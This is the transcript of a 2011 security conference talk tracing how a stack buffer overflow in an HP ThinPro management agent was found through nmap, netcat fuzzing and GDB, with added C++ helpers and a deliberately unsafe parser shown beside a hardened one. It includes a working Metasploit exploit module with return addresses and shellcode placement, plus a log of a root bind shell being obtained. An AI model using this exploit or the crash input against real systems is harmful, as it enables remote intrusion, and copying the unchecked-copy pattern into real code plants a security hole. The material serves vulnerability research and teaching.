
Zero to 0day in 4+1

ajxchapman
October 21, 2011



Transcript

  1. Zero to 0day in 4+1 (and a bit)
    Alex Chapman, \Con\Con 2011
  2. Initial Recon - Nmap
    Nmap scan report for 192.168.93.132
    PORT      STATE SERVICE         VERSION
    111/tcp   open  rpcbind         2 (rpc #100000)
    4000/tcp  open  remoteanything?
    6000/tcp  open  X11             (access denied)
    40001/tcp open  unknown
    48578/tcp open  status          1 (rpc #100024)
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
    SF-Port40001-TCP:V=5.35DC1%I=7%D=6/23%Time=4E030EC3%P=i686-pc-linux-gnu%r(
    SF:SIPOptions,8A,"Length:22\x2022\r\nFrom:0\r\nCompress:no\r\nVersion:4\r\
    SF:nTaskID:0\r\nTaskType:AuthenticationResult\r\nAddress:00:0C:29:3A:5C:9E
    SF:\r\n\r\n<ACK>InvalidTask</ACK>");
    Device type: general purpose
    Running: Linux 2.6.X
    OS details: Linux 2.6.13 - 2.6.31
  3. Nmap Service Probes
    • Nmap service probes send data designed to trigger a response from a listening service port
    • Responses are matched against regular expressions to identify previously profiled services
    • Probe / response signatures are stored in the “nmap-service-probes” file in the nmap directory
    SF-Port40001-TCP:V=5.35DC1%I=7%D=6/23%Time=4E030EC3%P=i686-pc-linux-gnu%r(
    SF:SIPOptions,8A,"Length:22\x2022\r\nFrom:0\r\nCompress:no\r\nVersion:4\r\
    SF:nTaskID:0\r\nTaskType:AuthenticationResult\r\nAddress:00:0C:29:3A:5C:9E
    SF:\r\n\r\n<ACK>InvalidTask</ACK>");
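An added example, not part of the deck: a small C++ decoder for the SF fingerprint record shown above. Nmap wraps the record across `SF:` continuation lines and escapes non-printable bytes, so the 0x8A (138) bytes the unknown service returned are awkward to read in that form. The decoder joins the lines, unescapes them, checks the decoded size against the declared length and indexes the `Key:Value` headers the service answered with. The four input lines are the ones Nmap printed on slide 2, embedded here as string literals; `ServiceFingerprint`, `parseFingerprint` and `fingerprintIsConsistent` are names chosen for this example, not Nmap APIs.

```cpp
// Added example, not from the talk: decode the "SF-Port..." fingerprint that
// Nmap printed for port 40001 (slide 2) back into the raw bytes the unknown
// service returned, and index its "Key:Value" header lines.
#include <cstdio>
#include <map>
#include <stdexcept>
#include <string>
#include <vector>

struct ServiceFingerprint {
    std::string probe;                           // Nmap probe name, e.g. SIPOptions
    size_t declaredLength = 0;                   // byte count Nmap recorded (hex in the record)
    std::string response;                        // decoded raw response bytes
    std::map<std::string, std::string> fields;   // "Key:Value" lines of the response
};

// The four fingerprint lines exactly as Nmap printed them on slide 2
// (constructed here as C++ string literals, so each backslash is doubled).
const std::vector<std::string> kNmapLines = {
    "SF-Port40001-TCP:V=5.35DC1%I=7%D=6/23%Time=4E030EC3%P=i686-pc-linux-gnu%r(",
    "SF:SIPOptions,8A,\"Length:22\\x2022\\r\\nFrom:0\\r\\nCompress:no\\r\\nVersion:4\\r\\",
    "SF:nTaskID:0\\r\\nTaskType:AuthenticationResult\\r\\nAddress:00:0C:29:3A:5C:9E",
    "SF:\\r\\n\\r\\n<ACK>InvalidTask</ACK>\");",
};

// Nmap wraps the record and prefixes continuation lines with "SF:"; an escape
// such as \r\n may be split across the wrap, so join first and unescape later.
static std::string joinFingerprintLines(const std::vector<std::string>& lines) {
    std::string joined;
    for (const std::string& line : lines)
        joined += (line.compare(0, 3, "SF:") == 0) ? line.substr(3) : line;
    return joined;
}

// Undo Nmap's fingerprint escaping: \xHH, \r, \n, \t, \\ and \".
static std::string unescapeNmap(const std::string& s) {
    std::string out;
    for (size_t i = 0; i < s.size(); ++i) {
        if (s[i] != '\\' || i + 1 >= s.size()) { out += s[i]; continue; }
        char c = s[++i];
        if (c == 'r')      out += '\r';
        else if (c == 'n') out += '\n';
        else if (c == 't') out += '\t';
        else if (c == 'x') {
            if (i + 2 >= s.size()) throw std::runtime_error("truncated \\x escape");
            out += static_cast<char>(std::stoi(s.substr(i + 1, 2), nullptr, 16));
            i += 2;
        } else out += c;   // \\ and \"
    }
    return out;
}

ServiceFingerprint parseFingerprint(const std::vector<std::string>& lines) {
    const std::string rec = joinFingerprintLines(lines);
    const size_t npos = std::string::npos;
    size_t r = rec.find("%r(");                                   // start of the probe/response record
    size_t nameEnd = (r == npos) ? npos : rec.find(',', r + 3);
    size_t lenEnd = (nameEnd == npos) ? npos : rec.find(',', nameEnd + 1);
    size_t open = (lenEnd == npos) ? npos : rec.find('"', lenEnd + 1);
    if (open == npos) throw std::runtime_error("malformed %r() record");
    // Find the closing quote, stepping over escaped characters.
    size_t close = open + 1;
    while (close < rec.size() && rec[close] != '"') close += (rec[close] == '\\') ? 2 : 1;
    if (close >= rec.size()) throw std::runtime_error("unterminated response string");

    ServiceFingerprint fp;
    fp.probe = rec.substr(r + 3, nameEnd - r - 3);
    fp.declaredLength = std::stoul(rec.substr(nameEnd + 1, lenEnd - nameEnd - 1), nullptr, 16);
    fp.response = unescapeNmap(rec.substr(open + 1, close - open - 1));

    // The service answers with CRLF-separated "Key:Value" headers; index them.
    for (size_t pos = 0; pos < fp.response.size();) {
        size_t eol = fp.response.find("\r\n", pos);
        std::string line = fp.response.substr(pos, eol == npos ? npos : eol - pos);
        size_t colon = line.find(':');
        if (colon != npos) fp.fields[line.substr(0, colon)] = line.substr(colon + 1);
        if (eol == npos) break;
        pos = eol + 2;
    }
    return fp;
}

// Sanity check for any SF record: does the declared length match what the
// escaped text decodes to?
bool fingerprintIsConsistent(const ServiceFingerprint& fp) {
    return fp.declaredLength == fp.response.size();
}

int main() {
    ServiceFingerprint fp = parseFingerprint(kNmapLines);
    std::printf("probe=%s declared=%zu decoded=%zu consistent=%d\n", fp.probe.c_str(),
                fp.declaredLength, fp.response.size(), fingerprintIsConsistent(fp));
    for (const auto& kv : fp.fields)
        std::printf("  %s = %s\n", kv.first.c_str(), kv.second.c_str());
    return 0;
}
```

The decoded record is the 138-byte reply reproduced on slide 5, which is how the `TaskType:AuthenticationResult` header that drives the rest of the deck first becomes visible: the "Length:22" header matches the 22-byte `<ACK>InvalidTask</ACK>` body, and the declared 0x8A matches the decoded size, so the fingerprint was captured intact.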
  4. The Initial Request
    > nc -vvn 192.168.93.132 40001
    OPTIONS sip:nm SIP/2.0
    Via: SIP/2.0/TCP nm;branch=foo
    From: <sip:nm@nm>;tag=root
    To: <sip:nm2@nm2>
    Call-ID: 50000
    CSeq: 42 OPTIONS
    Max-Forwards: 70
    Content-Length: 0
    Contact: <sip:nm@nm>
    Accept: application/sdp
  5. The Initial Request
    > nc -vvn 192.168.93.132 40001
    OPTIONS sip:nm SIP/2.0
    Via: SIP/2.0/TCP nm;branch=foo
    From: <sip:nm@nm>;tag=root
    To: <sip:nm2@nm2>
    Call-ID: 50000
    CSeq: 42 OPTIONS
    Max-Forwards: 70
    Content-Length: 0
    Contact: <sip:nm@nm>
    Accept: application/sdp

    Length:22 22
    From:0
    Compress:no
    Version:4
    TaskID:0
    TaskType:AuthenticationResult
    Address:00:0C:29:3A:5C:9E

    <ACK>InvalidTask</ACK>
    sent 223, rcvd 138
  6. Refining The Request
    > nc -vvn 192.168.93.132 40001
    OPTIONS sip:nm SIP/2.0
    Via: SIP/2.0/TCP nm;branch=foo
    From: <sip:nm@nm>;tag=root
    To: <sip:nm2@nm2>
    Call-ID: 50000
    CSeq: 42 OPTIONS
    Max-Forwards: 70
    Content-Length: 0
    Contact: <sip:nm@nm>
    Accept: application/sdp
    TaskType:AuthenticationResult
  7. Refining The Request
    > nc -vvn 192.168.93.132 40001
    OPTIONS sip:nm SIP/2.0
    Via: SIP/2.0/TCP nm;branch=foo
    From: <sip:nm@nm>;tag=root
    To: <sip:nm2@nm2>
    Call-ID: 50000
    CSeq: 42 OPTIONS
    Max-Forwards: 70
    Content-Length: 0
    Contact: <sip:nm@nm>
    Accept: application/sdp
    TaskType:AuthenticationResult

    Length:11 11
    From:0
    Compress:no
    Version:4
    TaskID:0
    TaskType:AuthenticationResult
    Address:00:0C:29:3A:5C:9E

    <ACK></ACK>
    sent 256, rcvd 127
  8. Refining The Request
    > nc -vvn 192.168.93.132 40001
    TaskType:AuthenticationResult
    Content-Length: 0
  9. Refining The Request
    > nc -vvn 192.168.93.132 40001
    TaskType:AuthenticationResult
    Content-Length: 0

    Length:11 11
    From:0
    Compress:no
    Version:4
    TaskID:0
    TaskType:AuthenticationResult
    Address:00:0C:29:3A:5C:9E

    <ACK></ACK>
    sent 54, rcvd 127
  10. Fuzzing The Request
    > nc -vvn 192.168.93.132 40001
    TaskType:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Content-Length: 0
  11. Fuzzing The Request
    > nc -vvn 192.168.93.132 40001
    TaskType:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Content-Length: 0
    sent 534, rcvd 0
  12. Fuzzing The Request
    > nmap -sS -PN -p 40001 192.168.93.132
    Nmap scan report for 192.168.93.132
    PORT      STATE  SERVICE
    40001/tcp closed unknown
    Ooops!!1!
  13. The End...
    • Unfortunately, at this point we were running out of time on the client site
    • Lots of other testing and reporting to be done
    • The issue was reported to the client as a Denial of Service vulnerability with potential for code execution
    ...Or Is It?
  14. Continuing The Pwnage
    • Fortunately HP provide a pre-configured ThinPro virtual machine for testing purposes
    • HP ThinPro Test Drive
    • Download and unpack the virtual machine and we’re ready to continue testing
  15. Setting Up The Debug Environment
    • Option 1: Configure the Virtual Machine with GDB
      • Vulnerable package already installed
      • No GDB or symbols
      • Root file system mounted read-only
    • Option 2: Install the vulnerable package on another distribution
      • Must ‘acquire’ the vulnerable package
      • GDB and symbols already installed
  16. Analysing The Crash – GDB
    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0xb61abb90 (LWP 3769)]
    0xb6e890c0 in std::string::assign () from /usr/lib/libstdc++.so.6
    (gdb) info reg
    eax            0x4141414d    1094795597
    ecx            0x1f4         500
    edx            0x80808000    -2139062272
    ebx            0xb6ed8ff4    -1225945100
    esp            0xb61ab080    0xb61ab080
    ebp            0xb61ab0a8    0xb61ab0a8
    esi            0x4141414d    1094795597
    edi            0xb61ab0d0    -1239764784
    eip            0xb6e890c0    0xb6e890c0
    eflags         0x10292       [ AF SF IF RF ]
    cs             0x73          115
    ss             0x7b          123
    ds             0x7b          123
    es             0x7b          123
    fs             0x0           0
    gs             0x33          51
  17. Analysing The Crash – GDB
    (gdb) x/100x $esp
    0xb61ab080: 0x00000003 0x00000041 0x00000061 0x00000000
    0xb61ab090: 0x00000004 0x080f9d61 0x080f9d63 0xb61ab0d0
    0xb61ab0a0: 0x09ec7381 0x09ec7378 0xb61ab208 0x080dda58
    0xb61ab0b0: 0x4141414d 0xb61ab0d0 0x000001f4 0xb6ed8ff4
    0xb61ab0c0: 0xb61ab2f8 0x00000014 0xb61ab0d0 0xb6d9ef15
    0xb61ab0d0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab0e0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab0f0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab100: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab110: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab120: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab130: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab140: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab150: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab160: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab170: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab180: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab190: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1a0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1b0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1c0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1d0: 0x41414141 0x41414141 0x41414141 0x41414141
  18. Classic Stack Based Buffer Overflow
    (gdb) x/100x $esp
    0xb61ab080: 0x00000003 0x00000041 0x00000061 0x00000000
    0xb61ab090: 0x00000004 0x080f9d61 0x080f9d63 0xb61ab0d0
    0xb61ab0a0: 0x09ec7381 0x09ec7378 0xb61ab208 0x080dda58
    0xb61ab0b0: 0x4141414d 0xb61ab0d0 0x000001f4 0xb6ed8ff4
    0xb61ab0c0: 0xb61ab2f8 0x00000014 0xb61ab0d0 0xb6d9ef15
    0xb61ab0d0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab0e0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab0f0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab100: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab110: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab120: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab130: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab140: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab150: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab160: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab170: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab180: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab190: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1a0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1b0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1c0: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb61ab1d0: 0x41414141 0x41414141 0x41414141 0x41414141
  20. Locating The Vulnerable Function
    • Set a breakpoint in the crashing function in GDB
    • Run a non-overflowing test case
    • Backtrace the code execution back from libstdc++
    • This gives us the address of the vulnerable function
    • Next step, load the binaries into IDA and disassemble
    (gdb) backtrace
    #0  0xb667ee10 in std::string::assign () from /usr/lib/libstdc++.so.6
    #1  0x080dda58 in ?? ()
    #2  0x08083c2d in ?? ()
    #3  0x08082f14 in ?? ()
    #4  0x08063bf1 in ?? ()
    #5  0xb66da96e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
    #6  0xb6524a4e in clone () from /lib/tls/i686/cmov/libc.so.6
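An added example, not from the talk: a small C++ triage helper for the crash analysis in slides 16 to 20. It reads a gdb `info reg` dump and reports which registers hold values assembled from the fuzzing fill byte, turning the by-eye reading of slide 16 (eax and esi are 0x4141414d, eip still points into libstdc++) into a repeatable check a tester can attach to a crash report when deciding whether a crash is a plain denial of service or has reached attacker-influenced state, the judgement slide 13 reports to the client. The register lines are a constructed copy of the slide 16 output; `taintedRegisters`, `countFillBytes` and `instructionPointerTainted` are names chosen for this example.

```cpp
// Added example, not from the talk: read a gdb "info reg" dump and report
// which registers carry values built from the fuzzing fill byte (0x41 here),
// so the severity judgement for a crash rests on a check rather than on
// eyeballing hex.
#include <cstdint>
#include <cstdio>
#include <sstream>
#include <string>
#include <vector>

struct RegisterHit {
    std::string name;
    uint32_t value;
    int fillBytes;   // how many of the 4 bytes equal the fill byte
};

// Count the bytes of a 32-bit value that equal `fill`.
int countFillBytes(uint32_t v, uint8_t fill) {
    int n = 0;
    for (int i = 0; i < 4; ++i)
        if (((v >> (8 * i)) & 0xffu) == fill) ++n;
    return n;
}

// Parse lines of the form "name 0xHEX ..." and return the registers whose
// value has at least `minFillBytes` fill bytes. A threshold of 3 also catches
// a fill value plus a small offset, such as 0x4141414d = 0x41414141 + 0xc.
std::vector<RegisterHit> taintedRegisters(const std::string& dump, uint8_t fill,
                                          int minFillBytes = 3) {
    std::vector<RegisterHit> hits;
    std::istringstream in(dump);
    std::string line;
    while (std::getline(in, line)) {
        std::istringstream cols(line);
        std::string name, hex;
        if (!(cols >> name >> hex) || hex.compare(0, 2, "0x") != 0) continue;  // skip non-register lines
        uint32_t value = static_cast<uint32_t>(std::stoul(hex, nullptr, 16));
        int n = countFillBytes(value, fill);
        if (n >= minFillBytes) hits.push_back({name, value, n});
    }
    return hits;
}

// True only when the instruction pointer itself is made entirely of fill
// bytes. On slide 16 it is not: eip is inside std::string::assign, so the
// over-long input has corrupted data pointers but the fault happened before
// any return address was consumed.
bool instructionPointerTainted(const std::string& dump, uint8_t fill) {
    for (const RegisterHit& h : taintedRegisters(dump, fill, 4))
        if (h.name == "eip" || h.name == "rip" || h.name == "pc") return true;
    return false;
}

// Register state from slide 16 (constructed copy of the gdb output).
const char* const kCrashRegisters =
    "eax 0x4141414d 1094795597\n"
    "ecx 0x1f4 500\n"
    "edx 0x80808000 -2139062272\n"
    "ebx 0xb6ed8ff4 -1225945100\n"
    "esp 0xb61ab080 0xb61ab080\n"
    "ebp 0xb61ab0a8 0xb61ab0a8\n"
    "esi 0x4141414d 1094795597\n"
    "edi 0xb61ab0d0 -1239764784\n"
    "eip 0xb6e890c0 0xb6e890c0\n"
    "eflags 0x10292 [ AF SF IF RF ]\n"
    "cs 0x73 115\n"
    "ss 0x7b 123\n";

int main() {
    for (const RegisterHit& h : taintedRegisters(kCrashRegisters, 0x41))
        std::printf("%s = 0x%08x (%d fill bytes)\n", h.name.c_str(), h.value, h.fillBytes);
    std::printf("instruction pointer tainted: %s\n",
                instructionPointerTainted(kCrashRegisters, 0x41) ? "yes" : "no");
    return 0;
}
```

Run on the slide 16 dump it flags eax and esi and nothing else; ecx holds 500 (0x1f4), which is the length of the fuzzed TaskType value rather than fill bytes, a useful cross-check that the value reached std::string::assign as its length argument.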
  21. Exploiting The Vulnerability
    • Exploiting this issue is actually rather easy
    • The cut-down Linux distribution includes no NX (DEP) or ASLR
    • Only two issues to overcome
      • The program does not crash while attempting to return to 0x41414141 (as hoped)
      • The crash appears in a call to the “std::string::assign” function in the “libstdc++” module
      • The stack needs fixing in order to execute our own code
  22. Calling std::string::assign
    • Assigns new content to a string
    • std::string::assign(char const*, unsigned int)
    • Actually takes 3 arguments
      • A pointer to a string
      • The unsigned integer is the length of our input buffer
      • The char const* is a pointer to our input buffer
    • The application takes care of arguments 2 and 3
    • We can supply any pointer to writable memory for argument 1
      • 0x0811b0a4
      • 0x0811b104
      • 0x0811b164
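An added example, not the HPDM agent's code: a hypothetical reconstruction of the bug class described on slide 18 (a classic stack-based overflow) and slide 22 (the application hands std::string::assign a pointer and a length it computed itself), placed beside a hardened parser for the same `Key:Value` line format. The unsafe function stages the field value in a fixed-size stack buffer before calling assign; the hardened parser checks the length before any copy and lets std::string own the storage, so the 500-byte TaskType from slide 10 is rejected instead of overrunning anything. `storeFieldUnsafe`, `parseMessage`, `fuzzRequest`, `checkRequest`, `parsedFields` and the limits `kMaxValueLen` / `kMaxFields` are choices made for this example.

```cpp
// Added example, not the HPDM agent's code: a hypothetical reconstruction of
// the overflow pattern next to a hardened parser for "Key:Value" messages.
#include <cstddef>
#include <cstdio>
#include <cstring>
#include <map>
#include <string>

// --- Vulnerable pattern (hypothetical) --------------------------------------
// The value is staged in a fixed-size stack buffer before being handed to
// std::string::assign with its real length. A value longer than the buffer
// (the deck's fuzz case is 500 bytes) overruns `scratch` and overwrites
// neighbouring stack state, so assign() later operates on corrupted pointers,
// which is what the 0x4141414d in eax/esi on slide 16 shows. This function is
// kept only to show the shape of the bug; never call it with len > 64.
void storeFieldUnsafe(const char* value, size_t len, std::string& out) {
    char scratch[64];
    std::memcpy(scratch, value, len);   // no check against sizeof(scratch)
    out.assign(scratch, len);
}

// --- Hardened parser ---------------------------------------------------------
enum class ParseStatus { Ok, FieldTooLong, Malformed, TooManyFields };

// Assumed limits for this example: the longest legitimate value on the slides
// ("AuthenticationResult") is 20 bytes, so 64 leaves headroom.
constexpr size_t kMaxValueLen = 64;
constexpr size_t kMaxFields   = 16;

// Parses "Key:Value" lines (LF or CRLF terminated; a blank line ends the
// headers). Every byte lands in a std::string that owns its storage, and the
// length is checked before the value is stored anywhere.
ParseStatus parseMessage(const std::string& msg, std::map<std::string, std::string>& fields) {
    const size_t npos = std::string::npos;
    fields.clear();
    size_t pos = 0;
    while (pos < msg.size()) {
        size_t eol = msg.find('\n', pos);
        std::string line = msg.substr(pos, eol == npos ? npos : eol - pos);
        pos = (eol == npos) ? msg.size() : eol + 1;
        if (!line.empty() && line.back() == '\r') line.pop_back();
        if (line.empty()) break;                                  // end of headers
        size_t colon = line.find(':');
        if (colon == npos || colon == 0) return ParseStatus::Malformed;
        std::string key = line.substr(0, colon);
        std::string value = line.substr(colon + 1);
        value.erase(0, value.find_first_not_of(' '));            // tolerate "Content-Length: 0"
        if (value.size() > kMaxValueLen) return ParseStatus::FieldTooLong;
        if (fields.size() >= kMaxFields) return ParseStatus::TooManyFields;
        fields[key] = value;
    }
    return ParseStatus::Ok;
}

// The request shape the deck sends on slide 10: "TaskType:" plus n fill bytes.
std::string fuzzRequest(size_t n, char fill = 'A') {
    return "TaskType:" + std::string(n, fill) + "\nContent-Length: 0\n\n";
}

// Status only, for quick checks.
ParseStatus checkRequest(const std::string& msg) {
    std::map<std::string, std::string> fields;
    return parseMessage(msg, fields);
}

// Parsed fields, empty when the message is rejected.
std::map<std::string, std::string> parsedFields(const std::string& msg) {
    std::map<std::string, std::string> fields;
    if (parseMessage(msg, fields) != ParseStatus::Ok) fields.clear();
    return fields;
}

int main() {
    const char* names[] = {"Ok", "FieldTooLong", "Malformed", "TooManyFields"};
    std::printf("20-byte TaskType:  %s\n", names[static_cast<int>(checkRequest(fuzzRequest(20)))]);
    std::printf("500-byte TaskType: %s\n", names[static_cast<int>(checkRequest(fuzzRequest(500)))]);
    return 0;
}
```

The hardened parser accepts the minimal request from slide 8 and rejects the slide 10 fuzz case with `FieldTooLong` before any copy takes place; the length check sits on the value itself, not on a buffer the caller has to size correctly.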
  23. Fixing The Stack
    0xb59b51cc: 0x41414141 0x0811b098 0x41414141 0x41414141
    0xb59b51dc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb59b51ec: 0x41414141 0x41414141 0x41414141 0x41414141
    0xb59b51fc: 0x41414141 0x41414141 0x41414141 0x41414141
    • The stack at the end of the function looks like above
    • The argument we passed to std::string::assign is in the way of executing shellcode directly with a JMP ESP
    • Two options
      • Return to a JMP [ESP+4]
      • Return to a POP, RET then a JMP ESP
    • These both have the same result: code execution begins after the std::string::assign argument
  24. The Metasploit Module
    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'     => 'HPDMAgent TaskType Buffer Overflow',
          'Payload'  => {
            'Space'    => 1024,
            'BadChars' => "\x00\x0a\x0d\xff",
          },
          'Platform' => 'linux',
          'Targets'  => [
            ['HP ThinPro', { 'Ret' => 0x0810093f, 'PopRet' => 0x08052632, 'StrObj' => 0x0811B0A4, }],
          ],
          'DefaultTarget' => 0))
        register_options([ Opt::RPORT(40001) ], self.class)
      end

      def exploit
        connect()
        exdata  = "TaskType:" + Rex::Text.rand_text_alpha(316)
        exdata += [target['PopRet']].pack('V')
        exdata += [target['StrObj'] - 0xC].pack('V')
        exdata += [target['Ret']].pack('V')
        exdata += payload.encoded
        exdata += "\r\nContent-Length: 1\r\n\r\n\r\n"
        sock.put(exdata)
        handler()
        disconnect()
      end
    end
  25. The Metasploit Module
    msf > use linux/misc/hpdmagent
    msf > set PAYLOAD linux/x86/shell_bind_tcp
    PAYLOAD => linux/x86/shell_bind_tcp
    msf exploit(hpdmagent) > set RHOST 192.168.91.147
    RHOST => 192.168.91.147
    msf exploit(hpdmagent) > exploit
    [*] Started bind handler
    [*] Command shell session 1 opened (192.168.91.131:54453 -> 192.168.91.147:4444) at Fri Oct 14 12:14:55 -0400 2011
    hostname
    HP000c29356281
    id
    uid=0(root) gid=0(root) groups=0(root)
  26. Identifying These Issues
    • Manual Fuzzing (netcat and persistence)
    • Automated Fuzzing
      • Sulley
      • Peach
      • CAT Fuzzer
    • Nessus (dumb luck)